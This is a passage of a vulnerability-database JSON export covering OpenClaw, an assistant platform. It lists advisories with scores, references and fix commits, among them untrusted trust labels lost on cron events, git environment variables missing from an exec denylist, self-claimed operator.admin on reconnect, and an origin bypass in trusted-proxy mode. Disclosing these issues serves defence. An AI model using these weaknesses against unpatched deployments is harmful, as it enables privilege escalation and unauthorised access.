Severity is low.\n\n## Fix\n\nOpenClaw now preserves untrusted labels for isolated cron awareness events and forwards the trust flag through cron delivery helpers.\n\nFix commit:\n\n- `f61896b03cc7031f51106a04566831f4ac2a0bd7`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44999","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04732","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04745","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04761","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44999"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"}],"url":"https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7"},{"reference_url":"https://git
hub.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44999","reference_id":"","reference_type":"","scores":[{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44999"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-impro
per-trust-labeling-in-isolated-cron-awareness-events"},{"reference_url":"https://github.com/advisories/GHSA-57r2-h2wj-g887","reference_id":"GHSA-57r2-h2wj-g887","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-57r2-h2wj-g887"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44999","GHSA-57r2-h2wj-g887"],"risk_score":2.9,"exploitability":"0.5","weighted_severity":"5.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2c8p-gbaw-3ye4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90094?format=json","vulnerability_id":"VCID-2h6a-becf-x7ej","summary":"OpenClaw: GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant)\n## Impact\n\nGIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant).\n\nGit plumbing environment variables were not removed before host exec and could redirect Git operations.\n\nOpenClaw is a user-controlled local assistant. 
This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.3.30`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41915","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04648","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04661","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04675","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41915"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements"
:"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41915","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41915"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment","reference_id":"","reference_type":"","scores
":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment"},{"reference_url":"https://github.com/advisories/GHSA-cm8v-2vh9-cxf3","reference_id":"GHSA-cm8v-2vh9-cxf3","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cm8v-2vh9-cxf3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed
-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41915","GHSA-cm8v-2vh9-cxf3"],"risk_score":2.6,"exploitability":"0.5","weighted_severity":"5.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2h6a-becf-x7ej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91183?format=json","vulnerability_id":"VCID-2hca-3v8f-f3e8","summary":"OpenClaw: Gateway Backend Reconnect lets 
Non-Admin Operator Scopes Self-Claim operator.admin\n## Summary\n\nGateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBackend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowing non-admin operators to reconnect as `operator.admin`. Commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` removes the backend self-pairing skip and requires pairing when requested scopes exceed the approved baseline.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`.\n\n## Fix Commit(s)\n\n- `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35663","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35663"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U
/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35663","reference_id":"CVE-2026-35663","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35663"},{"reference_url":"https://github.com/advisories/GHSA-9hjh-fr4f-gxc4","reference_id":"GHSA-9hjh-fr4f-gxc4","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9hjh-fr4f-gxc4"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-
self-claim","reference_id":"openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim"}],"fixed_packages":[],"aliases":["CVE-2026-35663","GHSA-9hjh-fr4f-gxc4"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2hca-3v8f-f3e8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50922?format=json","vulnerability_id":"VCID-2jsx-pvnr-6ydn","summary":"OpenClaw: Untrusted web origins can obtain authenticated operator.admin access in trusted-proxy mode\nIn affected versions of `openclaw`, browser-originated WebSocket connections could bypass origin validation when `gateway.auth.mode` was set to `trusted-proxy` and the request arrived with proxy headers. 
A page served from an untrusted origin could connect through a trusted reverse proxy, inherit proxy-authenticated identity, and establish a privileged operator session.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32302","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06067","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06051","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06054","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32302"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-13T13:10:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026
-03-13T13:10:50Z/"}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32302","reference_id":"CVE-2026-32302","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32302"},{"reference_url":"https://github.com/advisories/GHSA-5wcw-8jjv-m286","reference_id":"GHSA-5wcw-8jjv-m286","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5wcw-8jjv-m286"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wcw-8jjv-m286","reference_id":"GHSA-5wcw-8jjv-m286","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-13T13:10:50Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wcw-8jjv-m286"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-
a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-
